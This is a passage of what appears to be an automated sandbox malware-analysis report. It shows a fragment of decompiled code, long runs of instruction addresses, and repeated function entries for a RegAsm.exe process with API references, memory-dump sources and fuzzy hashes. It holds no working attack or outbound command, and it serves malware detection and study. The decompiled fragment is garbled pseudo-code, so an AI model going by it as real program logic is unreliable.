				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t393;
				 *_t420 =  *_t420 + _t420;
				 *_t393 =  *_t393 + _t393;
				 *_t393 =  *_t393 + _t393;
				 *_t393 =  *_t393 + 0xffffffc3;
				asm("adc al, 0x3c");
				_t394 = _t393 + 0x69;
				 *_t463 =  *_t463 + _t407;
				 *_t394 =  *_t394 & _t394;
				 *_t394 =  *_t394 + _t394;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t394;
				 *_t438 =  *_t438 + 0x22;
				return _t394;
			}





































































































                                                0x0109f5c6
                                                0x0109f5cb
                                                0x0109f5d1
                                                0x0109f5d2
                                                0x0109f5d3
                                                0x0109f5d5
                                                0x0109f5db
                                                0x0109f5df
                                                0x0109f5e1
                                                0x0109f5e3
                                                0x0109f5e5
                                                0x0109f5e7
                                                0x0109f5ed
                                                0x0109f5f3
                                                0x0109f5f5
                                                0x0109f5f6
                                                0x0109f5f7
                                                0x0109f5f9
                                                0x0109f5fb
                                                0x0109f5fc
                                                0x0109f5fd
                                                0x0109f601
                                                0x0109f602
                                                0x0109f603
                                                0x0109f605
                                                0x0109f608
                                                0x0109f60d
                                                0x0109f60e
                                                0x0109f60f
                                                0x0109f611
                                                0x0109f618
                                                0x0109f61a
                                                0x0109f61b
                                                0x0109f61d
                                                0x0109f620
                                                0x0109f621
                                                0x0109f623
                                                0x0109f629
                                                0x0109f631
                                                0x0109f632
                                                0x0109f637
                                                0x0109f63a
                                                0x0109f63e
                                                0x0109f63f
                                                0x0109f641
                                                0x0109f645
                                                0x0109f647
                                                0x0109f64a
                                                0x0109f64b
                                                0x0109f64d
                                                0x0109f64f
                                                0x0109f653
                                                0x0109f65b
                                                0x0109f65e
                                                0x0109f665
                                                0x0109f667
                                                0x0109f673
                                                0x0109f674
                                                0x0109f675
                                                0x0109f677
                                                0x0109f685
                                                0x0109f690
                                                0x0109f697
                                                0x0109f69d
                                                0x0109f69f
                                                0x0109f6a1
                                                0x0109f6a3
                                                0x0109f6a5
                                                0x0109f6a7
                                                0x0109f6af
                                                0x0109f6bb
                                                0x0109f6c7
                                                0x0109f6cd
                                                0x0109f6d3
                                                0x0109f6d9
                                                0x0109f6db
                                                0x0109f6dd
                                                0x0109f6e0
                                                0x0109f6e1
                                                0x0109f6e3
                                                0x0109f6e9
                                                0x0109f6ef
                                                0x0109f6f5
                                                0x0109f6fb
                                                0x0109f6fd
                                                0x0109f703
                                                0x0109f704
                                                0x0109f708
                                                0x0109f70c
                                                0x0109f70e
                                                0x0109f717
                                                0x0109f724
                                                0x0109f726
                                                0x0109f72e
                                                0x0109f72f
                                                0x0109f731
                                                0x0109f732
                                                0x0109f738
                                                0x0109f73e
                                                0x0109f740
                                                0x0109f741
                                                0x0109f743
                                                0x0109f746
                                                0x0109f747
                                                0x0109f749
                                                0x0109f74f
                                                0x0109f751
                                                0x0109f753
                                                0x0109f755
                                                0x0109f75b
                                                0x0109f75d
                                                0x0109f75f
                                                0x0109f765
                                                0x0109f767
                                                0x0109f769
                                                0x0109f76b
                                                0x0109f76d
                                                0x0109f773
                                                0x0109f775
                                                0x0109f777
                                                0x0109f779
                                                0x0109f77b
                                                0x0109f781
                                                0x0109f787
                                                0x0109f789
                                                0x0109f78f
                                                0x0109f791
                                                0x0109f793
                                                0x0109f795
                                                0x0109f797
                                                0x0109f79d
                                                0x0109f79f
                                                0x0109f7a1
                                                0x0109f7a3
                                                0x0109f7a5
                                                0x0109f7ab
                                                0x0109f7ad
                                                0x0109f7af
                                                0x0109f7b1
                                                0x0109f7b3
                                                0x0109f7b9
                                                0x0109f7bb
                                                0x0109f7c1
                                                0x0109f7c7
                                                0x0109f7c9
                                                0x0109f7cb
                                                0x0109f7cd
                                                0x0109f7cf
                                                0x0109f7d5
                                                0x0109f7d7
                                                0x0109f7d9
                                                0x0109f7db
                                                0x0109f7dd
                                                0x0109f7e3
                                                0x0109f7e5
                                                0x0109f7e8
                                                0x0109f7ea
                                                0x0109f7ec
                                                0x0109f7ec
                                                0x0109f7ed
                                                0x0109f7f5
                                                0x0109f7f6
                                                0x0109f7f8
                                                0x0109f7fa
                                                0x0109f7fb
                                                0x0109f7fe
                                                0x0109f800
                                                0x0109f807
                                                0x0109f80d
                                                0x0109f811
                                                0x0109f813
                                                0x0109f815
                                                0x0109f81b
                                                0x0109f81e
                                                0x0109f821
                                                0x0109f823
                                                0x0109f829
                                                0x0109f82c
                                                0x0109f82d
                                                0x0109f82f
                                                0x0109f831
                                                0x0109f837
                                                0x0109f83a
                                                0x0109f83b
                                                0x0109f83d
                                                0x0109f83f
                                                0x0109f845
                                                0x0109f848
                                                0x0109f849
                                                0x0109f84b
                                                0x0109f84d
                                                0x0109f853
                                                0x0109f856
                                                0x0109f858
                                                0x0109f85a
                                                0x0109f85d
                                                0x0109f85f
                                                0x0109f861
                                                0x0109f864
                                                0x0109f866
                                                0x0109f868
                                                0x0109f86a
                                                0x0109f86a
                                                0x0109f86b
                                                0x0109f86d
                                                0x0109f86f
                                                0x0109f875
                                                0x0109f877
                                                0x0109f87d
                                                0x0109f87f
                                                0x0109f885
                                                0x0109f88b
                                                0x0109f88d
                                                0x0109f88f
                                                0x0109f891
                                                0x0109f893
                                                0x0109f899
                                                0x0109f89b
                                                0x0109f89f
                                                0x0109f8a1
                                                0x0109f8a7
                                                0x0109f8a9
                                                0x0109f8ab
                                                0x0109f8ad
                                                0x0109f8af
                                                0x0109f8b5
                                                0x0109f8b7
                                                0x0109f8be
                                                0x0109f8bf
                                                0x0109f8c5
                                                0x0109f8c8
                                                0x0109f8ca
                                                0x0109f8cc
                                                0x0109f8cd
                                                0x0109f8d0
                                                0x0109f8d2
                                                0x0109f8d4
                                                0x0109f8d9
                                                0x0109f8df
                                                0x0109f8e1
                                                0x0109f8e8
                                                0x0109f8e9
                                                0x0109f8ec
                                                0x0109f8f1
                                                0x0109f8f3
                                                0x0109f8f5
                                                0x0109f8fb
                                                0x0109f901
                                                0x0109f903
                                                0x0109f904
                                                0x0109f904
                                                0x0109f905
                                                0x0109f90b
                                                0x0109f90d
                                                0x0109f910
                                                0x0109f912
                                                0x0109f913
                                                0x0109f917
                                                0x0109f919
                                                0x0109f91f
                                                0x0109f925
                                                0x0109f927
                                                0x0109f929
                                                0x0109f92b
                                                0x0109f92d
                                                0x0109f933
                                                0x0109f939
                                                0x0109f93b
                                                0x0109f941
                                                0x0109f947
                                                0x0109f949
                                                0x0109f94f
                                                0x0109f951
                                                0x0109f954
                                                0x0109f956
                                                0x0109f958
                                                0x0109f95b
                                                0x0109f95e
                                                0x0109f965
                                                0x0109f96b
                                                0x0109f970
                                                0x0109f972
                                                0x0109f974
                                                0x0109f974
                                                0x0109f975
                                                0x0109f978
                                                0x0109f979
                                                0x0109f97b
                                                0x0109f97d
                                                0x0109f97f
                                                0x0109f981
                                                0x0109f987
                                                0x0109f989
                                                0x0109f98f
                                                0x0109f995
                                                0x0109f997
                                                0x0109f999
                                                0x0109f99b
                                                0x0109f99d
                                                0x0109f9a3
                                                0x0109f9a5
                                                0x0109f9a8
                                                0x0109f9aa
                                                0x0109f9ac
                                                0x0109f9af
                                                0x0109f9b4
                                                0x0109f9b5
                                                0x0109f9b7
                                                0x0109f9b9
                                                0x0109f9bf
                                                0x0109f9c1
                                                0x0109f9c7
                                                0x0109f9cf
                                                0x0109f9d1
                                                0x0109f9d3
                                                0x0109f9d5
                                                0x0109f9db
                                                0x0109f9dd
                                                0x0109f9e4
                                                0x0109f9e7
                                                0x0109f9ec
                                                0x0109f9ed
                                                0x0109f9ef
                                                0x0109f9f1
                                                0x0109f9f7
                                                0x0109f9fd
                                                0x0109f9ff
                                                0x0109fa05
                                                0x0109fa07
                                                0x0109fa09
                                                0x0109fa0b
                                                0x0109fa0d
                                                0x0109fa13
                                                0x0109fa15
                                                0x0109fa17
                                                0x0109fa19
                                                0x0109fa1b
                                                0x0109fa21
                                                0x0109fa23
                                                0x0109fa29
                                                0x0109fa2f
                                                0x0109fa31
                                                0x0109fa34
                                                0x0109fa36
                                                0x0109fa38
                                                0x0109fa38
                                                0x0109fa39
                                                0x0109fa3b
                                                0x0109fa3e
                                                0x0109fa3f
                                                0x0109fa46
                                                0x0109fa46
                                                0x0109fa47
                                                0x0109fa4a
                                                0x0109fa4b
                                                0x0109fa4e
                                                0x0109fa4f
                                                0x0109fa51
                                                0x0109fa53
                                                0x0109fa59
                                                0x0109fa5b
                                                0x0109fa5d
                                                0x0109fa5f
                                                0x0109fa61
                                                0x0109fa67
                                                0x0109fa69
                                                0x0109fa6b
                                                0x0109fa6d
                                                0x0109fa6f
                                                0x0109fa75
                                                0x0109fa76
                                                0x0109fa77
                                                0x0109fa7a
                                                0x0109fa7c
                                                0x0109fa7e
                                                0x0109fa7f
                                                0x0109fa85
                                                0x0109fa88
                                                0x0109fa8a
                                                0x0109fa8c
                                                0x0109fa8c
                                                0x0109fa8d
                                                0x0109fa93
                                                0x0109fa99
                                                0x0109fa9f
                                                0x0109faa5
                                                0x0109faa7
                                                0x0109faaf
                                                0x0109fab6
                                                0x0109fab6
                                                0x0109fab7
                                                0x0109fac0
                                                0x0109fac2
                                                0x0109fac4
                                                0x0109fac4
                                                0x0109fac6
                                                0x0109facc
                                                0x0109fad1
                                                0x0109fada
                                                0x0109fadd
                                                0x0109fadf
                                                0x0109fae5
                                                0x0109fae9
                                                0x0109faeb
                                                0x0109faed
                                                0x0109faf3
                                                0x0109faf7
                                                0x0109faf9
                                                0x0109fafb
                                                0x0109fb01
                                                0x0109fb04
                                                0x0109fb05
                                                0x0109fb07
                                                0x0109fb09
                                                0x0109fb0f
                                                0x0109fb12
                                                0x0109fb13
                                                0x0109fb15
                                                0x0109fb17
                                                0x0109fb1d
                                                0x0109fb20
                                                0x0109fb21
                                                0x0109fb23
                                                0x0109fb25
                                                0x0109fb2b
                                                0x0109fb2e
                                                0x0109fb2f
                                                0x0109fb31
                                                0x0109fb33
                                                0x0109fb39
                                                0x0109fb3c
                                                0x0109fb3d
                                                0x0109fb3f
                                                0x0109fb41
                                                0x0109fb47
                                                0x0109fb4a
                                                0x0109fb4b
                                                0x0109fb4d
                                                0x0109fb4f
                                                0x0109fb55
                                                0x0109fb58
                                                0x0109fb5a
                                                0x0109fb5c
                                                0x0109fb5e
                                                0x0109fb61
                                                0x0109fb63
                                                0x0109fb66
                                                0x0109fb68
                                                0x0109fb6a
                                                0x0109fb6c
                                                0x0109fb6c
                                                0x0109fb6c
                                                0x0109fb6d
                                                0x0109fb70
                                                0x0109fb71
                                                0x0109fb74
                                                0x0109fb75
                                                0x0109fb77
                                                0x0109fb79
                                                0x0109fb7f
                                                0x0109fb82
                                                0x0109fb88
                                                0x0109fb88
                                                0x0109fb8a
                                                0x0109fb8b
                                                0x0109fb8d
                                                0x0109fb90
                                                0x0109fb92
                                                0x0109fb94
                                                0x0109fb96
                                                0x0109fb99
                                                0x0109fb9b
                                                0x0109fb9e
                                                0x0109fba0
                                                0x0109fba2
                                                0x0109fba4
                                                0x0109fba7
                                                0x0109fbab
                                                0x0109fbb2
                                                0x0109fbb5
                                                0x0109fbbb
                                                0x0109fbbd
                                                0x0109fbbf
                                                0x0109fbc5
                                                0x0109fbc8
                                                0x0109fbca
                                                0x0109fbcc
                                                0x0109fbce
                                                0x0109fbd1
                                                0x0109fbd3
                                                0x0109fbd6
                                                0x0109fbd7
                                                0x0109fbd9
                                                0x0109fbdb
                                                0x0109fbe1
                                                0x0109fbe4
                                                0x0109fbe5
                                                0x0109fbe7
                                                0x0109fbe9
                                                0x0109fbef
                                                0x0109fbf4
                                                0x0109fbf6
                                                0x0109fbf8
                                                0x0109fbfb
                                                0x0109fbfd
                                                0x0109fc00
                                                0x0109fc01
                                                0x0109fc02
                                                0x0109fc04
                                                0x0109fc06
                                                0x0109fc09
                                                0x0109fc0a
                                                0x0109fc0c
                                                0x0109fc0d
                                                0x0109fc10
                                                0x0109fc12
                                                0x0109fc14
                                                0x0109fc17
                                                0x0109fc1c
                                                0x0109fc1e
                                                0x0109fc20
                                                0x0109fc23
                                                0x0109fc25
                                                0x0109fc26
                                                0x0109fc28
                                                0x0109fc29
                                                0x0109fc2c
                                                0x0109fc2e
                                                0x0109fc30
                                                0x0109fc31
                                                0x0109fc33
                                                0x0109fc39
                                                0x0109fc3a
                                                0x0109fc3c
                                                0x0109fc3e
                                                0x0109fc3f
                                                0x0109fc41
                                                0x0109fc47
                                                0x0109fc48
                                                0x0109fc4a
                                                0x0109fc4c
                                                0x0109fc4c
                                                0x0109fc4d
                                                0x0109fc50
                                                0x0109fc51
                                                0x0109fc54
                                                0x0109fc56
                                                0x0109fc58
                                                0x0109fc5b
                                                0x0109fc5d
                                                0x0109fc61
                                                0x0109fc63
                                                0x0109fc64
                                                0x0109fc66
                                                0x0109fc68
                                                0x0109fc69
                                                0x0109fc6f
                                                0x0109fc72
                                                0x0109fc74
                                                0x0109fc76
                                                0x0109fc76
                                                0x0109fc77
                                                0x0109fc7d
                                                0x0109fc83
                                                0x0109fc89
                                                0x0109fc8b
                                                0x0109fc8d
                                                0x0109fc8f
                                                0x0109fc91
                                                0x0109fc97
                                                0x0109fc9c
                                                0x0109fc9e
                                                0x0109fca0
                                                0x0109fca3
                                                0x0109fca5
                                                0x0109fca7
                                                0x0109fca9
                                                0x0109fcab
                                                0x0109fcad
                                                0x0109fcb3
                                                0x0109fcb6

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2168159857.0000000001012000.00000020.00020000.sdmp, Offset: 01010000, based on PE: true
                                                • Associated: 00000004.00000002.2168147761.0000000001010000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.2168241836.00000000010AA000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb50c54da0f7a1121957d0ff37c42dfcaf476882d859f20c49d2746b0b1cbb4a
                                                • Instruction ID: f217a4a322388110c49a429e5ba053c54d8f9f2a5b53b96fdc232f5e14023ebb
                                                • Opcode Fuzzy Hash: cb50c54da0f7a1121957d0ff37c42dfcaf476882d859f20c49d2746b0b1cbb4a
                                                • Instruction Fuzzy Hash: 6142FD6154E3D25FD7138B708CB9682BFB0AE1312575E4ADFC0C1CB8E3E258598AD762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: RegAsm.exe PID: 2364 Parent PID: 2708 RegAsm.exeCOMMON

                                                Executed Functions

                                                Function 00237CB8, Relevance: 4.0, APIs: 2, Instructions: 958COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 3b56079e18a9607041676a9504b8b3bfb7904042be422d3ead3806f649f701eb
                                                • Instruction ID: fb3163a5503586be63cbb3568acd6664f2bab5a0befc15eaf0bd545245cce35a
                                                • Opcode Fuzzy Hash: 3b56079e18a9607041676a9504b8b3bfb7904042be422d3ead3806f649f701eb
                                                • Instruction Fuzzy Hash: F9A227B4A18228CFCB65DF70C88869DB7B6BF48305F2084EAD54AA7350DB709E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237CD9, Relevance: 3.6, APIs: 2, Instructions: 631COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 9b07ca2414bd9914793cbfe5968fc19c9872153e4cb9b22fb956b0d716379fdd
                                                • Instruction ID: 28bd82ae18722b49d2dd2d5cf76a7d34e5236126f3519527af57c0d1e201ebf0
                                                • Opcode Fuzzy Hash: 9b07ca2414bd9914793cbfe5968fc19c9872153e4cb9b22fb956b0d716379fdd
                                                • Instruction Fuzzy Hash: 135239B4A18218CFCB25DF70C9886ACB7B6BF48305F2084EAD54AA7354DB708E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237D1E, Relevance: 3.6, APIs: 2, Instructions: 624COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 6caa6c035182d5ac2717451b66ce4a7acf00481d71e9a62b7a910b021b9a41a1
                                                • Instruction ID: 88870dcc8b561a059c179c06d42bbeade627d566d330a196fd582534dcf1425d
                                                • Opcode Fuzzy Hash: 6caa6c035182d5ac2717451b66ce4a7acf00481d71e9a62b7a910b021b9a41a1
                                                • Instruction Fuzzy Hash: F45239B4A14228CFCB25DF70C9886ACB7B6BF48305F2085EAD54AA7354DB708E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237D63, Relevance: 3.6, APIs: 2, Instructions: 615COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: afe6281c7cc77a407bdf0a0fa134598ba665b83a9184bb322876a630b96a00bc
                                                • Instruction ID: 9f756d7220714dffec46a3e2022723b442c472af5ee5c9376e94e6fc204a4741
                                                • Opcode Fuzzy Hash: afe6281c7cc77a407bdf0a0fa134598ba665b83a9184bb322876a630b96a00bc
                                                • Instruction Fuzzy Hash: BE5239B4A14218CFCB25DF70C9886ACB7B6BF48305F2085EAD54AA7354DB708E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237D9F, Relevance: 3.6, APIs: 2, Instructions: 610COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 2879abcdf23e6b20c0f14ac3d6cbb8e3f5fcc3f91102abf6cef84bcf4fa626d1
                                                • Instruction ID: 5f7635edfe95c71ca4c1ab26aec5e95bf7b318dbc3aecc1f222aec9e4956ecab
                                                • Opcode Fuzzy Hash: 2879abcdf23e6b20c0f14ac3d6cbb8e3f5fcc3f91102abf6cef84bcf4fa626d1
                                                • Instruction Fuzzy Hash: 915239B4A14218CFCB25DF70C9886ACB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237DE4, Relevance: 3.6, APIs: 2, Instructions: 603COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 212e82854538c837cb629f2d9f03d3cfb32bb01a2e1d5d1c7ebf6ce86313cb74
                                                • Instruction ID: c56a5cf1a29a3da372d7ee8d3698482d66ff56594d38b872d9b80495279c7d6f
                                                • Opcode Fuzzy Hash: 212e82854538c837cb629f2d9f03d3cfb32bb01a2e1d5d1c7ebf6ce86313cb74
                                                • Instruction Fuzzy Hash: 895229B4A14228CFCB24DF70C98869CB7B6BF48305F2085EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237E29, Relevance: 3.6, APIs: 2, Instructions: 596COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: dad410d2dcd3a31f3b0d4c04cf0bab7415525e7f7f6b5073da33cbbb0ac8c851
                                                • Instruction ID: c580e940670865620f439faf05f094fd2850b40d260bd56de92676515f1fc642
                                                • Opcode Fuzzy Hash: dad410d2dcd3a31f3b0d4c04cf0bab7415525e7f7f6b5073da33cbbb0ac8c851
                                                • Instruction Fuzzy Hash: 405229B4A14228CFCB24DF70C98869CB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0052A80C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0052C9F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359714399.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID: lRO
                                                • API String ID: 3660427363-3496118401
                                                • Opcode ID: 222fcabeeae0ec36cc2f7131895261d4726cb7bc95a122067dc97981ada008bd
                                                • Instruction ID: aa26088c2de3a078b493300746ad54333876371e5a78f91c28165be4eeafb9dc
                                                • Opcode Fuzzy Hash: 222fcabeeae0ec36cc2f7131895261d4726cb7bc95a122067dc97981ada008bd
                                                • Instruction Fuzzy Hash: C531E0B1D002689FCB10CF9AD884A9EBFF5BF49340F65852AE818AB351D770A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237E6E, Relevance: 3.6, APIs: 2, Instructions: 587COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: e7e7a545ddbc0a7562f112849c7711971642ee893b18bbdccd177a3201ad0ecd
                                                • Instruction ID: 5e24b15fac9938395b338f5d5c28dbd83deff0b7213808770890e4c83ecec305
                                                • Opcode Fuzzy Hash: e7e7a545ddbc0a7562f112849c7711971642ee893b18bbdccd177a3201ad0ecd
                                                • Instruction Fuzzy Hash: E95229B4A14218CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237EAA, Relevance: 3.6, APIs: 2, Instructions: 582COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 4069aa1651701cc158b2f380ca3c65301c2df9b12feb0626d82ff2e86ef7cc27
                                                • Instruction ID: 01546ac71c004a8cec5ab1c6852491e8cac1bf0d87c2d79a0e537d2c027ac2ba
                                                • Opcode Fuzzy Hash: 4069aa1651701cc158b2f380ca3c65301c2df9b12feb0626d82ff2e86ef7cc27
                                                • Instruction Fuzzy Hash: 8C5229B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237EEF, Relevance: 3.6, APIs: 2, Instructions: 575COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 4190dc17ab7a4e1a603a2611096ed4ef40f10792b005e5bb9f41d548de554c0b
                                                • Instruction ID: 8d1c2d33f5104ea8bc9d334b3b58fb3be2b65393ae5535af004076f5c061920d
                                                • Opcode Fuzzy Hash: 4190dc17ab7a4e1a603a2611096ed4ef40f10792b005e5bb9f41d548de554c0b
                                                • Instruction Fuzzy Hash: F34228B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237F34, Relevance: 3.6, APIs: 2, Instructions: 568COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: a8b69bee3d0fd4024aa3728f21a0796e5bcc813c283548954fdd55492c3d4213
                                                • Instruction ID: 5f88fdffb78ab61e7f6202a74c1796391a46ad9881a4117bb1878aa44d56931c
                                                • Opcode Fuzzy Hash: a8b69bee3d0fd4024aa3728f21a0796e5bcc813c283548954fdd55492c3d4213
                                                • Instruction Fuzzy Hash: 6D4228B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237F79, Relevance: 3.6, APIs: 2, Instructions: 561COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 9adeef0b78b6715f0d7dac3701cff03225275d6f7ed47f3640164abbb3f35215
                                                • Instruction ID: 177d3515a563a51f1d92baa13d406472f0d7538ea71924378b14e3c3dc0f2b5e
                                                • Opcode Fuzzy Hash: 9adeef0b78b6715f0d7dac3701cff03225275d6f7ed47f3640164abbb3f35215
                                                • Instruction Fuzzy Hash: CA4228B4A14228CFCB24DF70C98869DB7B6BF48305F2084EAE54AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00237FBE, Relevance: 3.6, APIs: 2, Instructions: 554COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: d90c68029d9857961c45a767c09136a9df16aa8b6918d33362bd42747b9a781b
                                                • Instruction ID: 8e07334ca0a8aee8f65c46b7283d1b4922198736bafdeeda0429d108b23c86e1
                                                • Opcode Fuzzy Hash: d90c68029d9857961c45a767c09136a9df16aa8b6918d33362bd42747b9a781b
                                                • Instruction Fuzzy Hash: 5E4239B4A14228CFCB24DF70C99869DB7B6BF48305F2084EAE50AA7354DB748E95CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00238003, Relevance: 3.5, APIs: 2, Instructions: 545COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 0023801E
                                                • KiUserExceptionDispatcher.NTDLL ref: 002389C8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359608971.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 089749b097f3e7dba3200e5abf73d83397e7bb8df27958c6ee5208028f7fc911
                                                • Instruction ID: 42123ebc75e3d559f44608d05a580bca02f9d81e060e2ed8fd784cd974f4adc5
                                                • Opcode Fuzzy Hash: 089749b097f3e7dba3200e5abf73d83397e7bb8df27958c6ee5208028f7fc911
